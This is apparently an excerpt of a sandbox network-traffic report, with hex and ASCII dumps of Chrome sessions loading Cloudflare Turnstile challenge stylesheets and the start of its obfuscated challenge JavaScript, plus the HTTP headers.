                                                                2025-01-07 21:36:03 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.1649732104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:04 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe714c69d748c29&lang=auto HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:04 UTC331INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:04 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 113014
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714cabe777ca2-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:04 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46
                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F
                                                                2025-01-07 21:36:04 UTC1369INData Raw: 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32
                                                                Data Ascii: nstile_overrun_description":"Stuck%20here%3F","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_expired":"Expired","check_delays":"Verification%2
                                                                2025-01-07 21:36:04 UTC1369INData Raw: 67 33 2c 67 34 2c 67 37 2c 67 38 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 67 35 2c 67 36 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 38 32 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 39 31 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 36 30 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 39 33 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 39 37 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 39 39 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 39 37 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39
                                                                Data Ascii: g3,g4,g7,g8,gB,gC,gG,gH,g5,g6){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(882))/1+-parseInt(gI(1391))/2+parseInt(gI(1560))/3*(parseInt(gI(1093))/4)+parseInt(gI(597))/5*(-parseInt(gI(699))/6)+-parseInt(gI(797))/7+parseInt(gI(9
                                                                2025-01-07 21:36:04 UTC1369INData Raw: 37 37 32 29 5d 5b 67 4d 28 31 35 38 32 29 5d 2c 6f 5b 67 4d 28 35 37 38 29 5d 3d 65 4d 5b 67 4d 28 37 37 32 29 5d 5b 67 4d 28 35 37 38 29 5d 2c 6f 5b 67 4d 28 31 32 31 34 29 5d 3d 65 4d 5b 67 4d 28 37 37 32 29 5d 5b 67 4d 28 31 32 32 33 29 5d 2c 6f 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 78 3d 67 34 5b 67 4d 28 35 35 31 29 5d 28 6d 29 5b 67 4d 28 39 33 35 29 5d 28 27 2b 27 2c 67 4d 28 33 36 36 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 42 3d 67 4d 28 31 32 33 33 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 43 5b 67 4d 28 33 35 38 29 5d 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 43 5b 67 4d 28 39 32 37 29 5d 28 42 2c 46 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27
                                                                Data Ascii: 772)][gM(1582)],o[gM(578)]=eM[gM(772)][gM(578)],o[gM(1214)]=eM[gM(772)][gM(1223)],o);continue;case'4':x=g4[gM(551)](m)[gM(935)]('+',gM(366));continue;case'5':B=gM(1233);continue;case'6':C[gM(358)]=5e3;continue;case'7':C[gM(927)](B,F,!![]);continue;case'8'
                                                                2025-01-07 21:36:04 UTC1369INData Raw: 5b 67 4e 28 38 30 30 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 32 5d 2c 31 30 29 2c 69 3d 65 5b 67 4e 28 38 30 30 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 33 5d 2c 31 30 29 29 29 3a 65 5b 67 4e 28 38 31 31 29 5d 28 65 2c 66 29 3a 66 3d 4a 53 4f 4e 5b 67 4e 28 36 34 35 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 67 4e 28 33 33 32 29 5d 3d 66 2c 6d 5b 67 4e 28 36 33 33 29 5d 3d 67 2c 6d 5b 67 4e 28 31 35 39 30 29 5d 3d 68 2c 6d 5b 67 4e 28 31 34 31 32 29 5d 3d 69 2c 6d 5b 67 4e 28 31 31 37 32 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4a 28 39 33 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 67 50 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 67 50 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 67 50 28 31 32 37 33 29 5d 3d 66 75 6e 63 74
                                                                Data Ascii: [gN(800)](parseInt,l[2],10),i=e[gN(800)](parseInt,l[3],10))):e[gN(811)](e,f):f=JSON[gN(645)](d);return m={},m[gN(332)]=f,m[gN(633)]=g,m[gN(1590)]=h,m[gN(1412)]=i,m[gN(1172)]=d,m},eM[gJ(933)]=function(e,f,g,h,i,gP,j,k,l,m,n,o){(gP=gJ,j={},j[gP(1273)]=funct
                                                                2025-01-07 21:36:04 UTC1369INData Raw: 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 72 29 7d 29 2c 66 74 3d 21 5b 5d 2c 21 65 55 28 67 4a 28 31 31 30 38 29 29 26 26 28 66 52 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 63 2c 63 2c 64 2c 65 29 7b 69 63 3d 67 4a 2c 63 3d 7b 27 43 42 44 53 63 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 6a 5a 55 46 58 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2d 67 7d 2c 27 63 69 4b 43 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 7d 2c 64 3d 65 4d 5b 69 63 28 37 37 32 29 5d 5b 69 63 28 31 34 31 31 29 5d 7c 7c 31 65 34 2c 65 3d 66 50 28 29 2c 21 65 4d 5b 69 63 28 36 39 31 29 5d 26 26 21 63 5b 69 63 28 36 32 38 29 5d 28 66 75 29 26 26 21 65
                                                                Data Ascii: learInterval(fr)}),ft=![],!eU(gJ(1108))&&(fR(),setInterval(function(ic,c,d,e){ic=gJ,c={'CBDSc':function(f){return f()},'jZUFX':function(f,g){return f-g},'ciKCM':function(f){return f()}},d=eM[ic(772)][ic(1411)]||1e4,e=fP(),!eM[ic(691)]&&!c[ic(628)](fu)&&!e
                                                                2025-01-07 21:36:04 UTC1369INData Raw: 33 38 29 5d 28 6b 2c 32 35 35 29 2d 68 2d 67 25 36 35 35 33 35 2b 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 69 5b 69 4b 28 39 39 35 29 5d 28 27 27 29 7d 2c 67 34 3d 66 75 6e 63 74 69 6f 6e 28 69 4d 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 69 4d 3d 67 4a 2c 64 3d 7b 27 67 73 4b 6c 42 27 3a 69 4d 28 31 34 38 32 29 2c 27 7a 70 6a 55 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 43 72 42 4f 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 59 62 73 52 61 27 3a 69 4d 28 31 36 33 32 29 2c 27 73 4d 75 4a 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 75 4a 7a 4e 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c
                                                                Data Ascii: 38)](k,255)-h-g%65535+65535)%255)));return i[iK(995)]('')},g4=function(iM,d,e,f,g){return iM=gJ,d={'gsKlB':iM(1482),'zpjUA':function(h,i){return h==i},'CrBOx':function(h,i){return h+i},'YbsRa':iM(1632),'sMuJz':function(h,i){return h>i},'uJzNy':function(h,
                                                                2025-01-07 21:36:04 UTC1369INData Raw: 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 44 3d 7b 7d 2c 45 3d 7b 7d 2c 46 3d 27 27 2c 47 3d 32 2c 48 3d 33 2c 49 3d 32 2c 4a 3d 5b 5d 2c 4b 3d 30 2c 4c 3d 30 2c 4d 3d 30 3b 4d 3c 6a 5b 69 4f 28 39 37 33 29 5d 3b 4d 2b 3d 31 29 69 66 28 4e 3d 6a 5b 69 4f 28 32 36 30 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 69 4f 28 38 35 37 29 5d 5b 69 4f 28 31 34 30 37 29 5d 5b 69 4f 28 37 36 34 29 5d 28 44 2c 4e 29 7c 7c 28 44 5b 4e 5d 3d 48 2b 2b 2c 45 5b 4e 5d 3d 21 30 29 2c 4f 3d 64 5b 69 4f 28 36 36 34 29 5d 28 46 2c 4e 29 2c 4f 62 6a 65 63 74 5b 69 4f 28 38 35 37 29 5d 5b 69 4f 28 31 34 30 37 29 5d 5b 69 4f 28 37 36 34 29 5d 28 44 2c 4f 29 29 46 3d 4f 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 69 4f 28 38 35 37 29 5d 5b 69 4f 28 31 34 30 37 29 5d 5b 69 4f 28 37
                                                                Data Ascii: )return'';for(D={},E={},F='',G=2,H=3,I=2,J=[],K=0,L=0,M=0;M<j[iO(973)];M+=1)if(N=j[iO(260)](M),Object[iO(857)][iO(1407)][iO(764)](D,N)||(D[N]=H++,E[N]=!0),O=d[iO(664)](F,N),Object[iO(857)][iO(1407)][iO(764)](D,O))F=O;else{if(Object[iO(857)][iO(1407)][iO(7
                                                                2025-01-07 21:36:04 UTC1369INData Raw: 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 64 5b 69 4f 28 31 35 31 37 29 5d 3d 3d 3d 64 5b 69 4f 28 31 35 31 37 29 5d 29 7b 66 6f 72 28 50 3d 31 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 69 4f 28 31 34 38 33 29 5d 28 4b 2c 31 29 7c 50 2c 64 5b 69 4f 28 33 37 33 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 69 4f 28 31 34 34 38 29 5d 28 64 5b 69 4f 28 36 31 36 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3d 30 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 69 4f 28 34 39 35 29 5d 28 30 29 2c 43 3d 30 3b 31 36 3e 43 3b 4b 3d 64 5b 69 4f 28 34 32 34 29 5d 28 4b 3c 3c 31 2e 32 36 2c 31 26 50 29 2c 4c 3d 3d 6f 2d 31 3f 28 4c 3d 30 2c 4a 5b 69 4f 28 31 34 34 38 29 5d 28 73 28 4b 29 29 2c
                                                                Data Ascii: (s(K)),K=0):L++,P>>=1,C++);}else if(d[iO(1517)]===d[iO(1517)]){for(P=1,C=0;C<I;K=d[iO(1483)](K,1)|P,d[iO(373)](L,o-1)?(L=0,J[iO(1448)](d[iO(616)](s,K)),K=0):L++,P=0,C++);for(P=F[iO(495)](0),C=0;16>C;K=d[iO(424)](K<<1.26,1&P),L==o-1?(L=0,J[iO(1448)](s(K)),
                                                                2025-01-07 21:36:04 UTC1369INData Raw: 61 73 65 27 33 27 3a 64 5b 69 52 28 39 36 30 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 69 52 28 33 30 36 29 5d 28 6f 2c 49 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 4a 7c 3d 64 5b 69 52 28 31 34 37 30 29 5d 28 64 5b 69 52 28 31 36 32 35 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 52 28 37 32 33 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 69 52 28 33 38 37 29 5d 28 46 2c 4b 29 3b 4e 3d 64 5b 69 52 28 31 30 33 36 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b
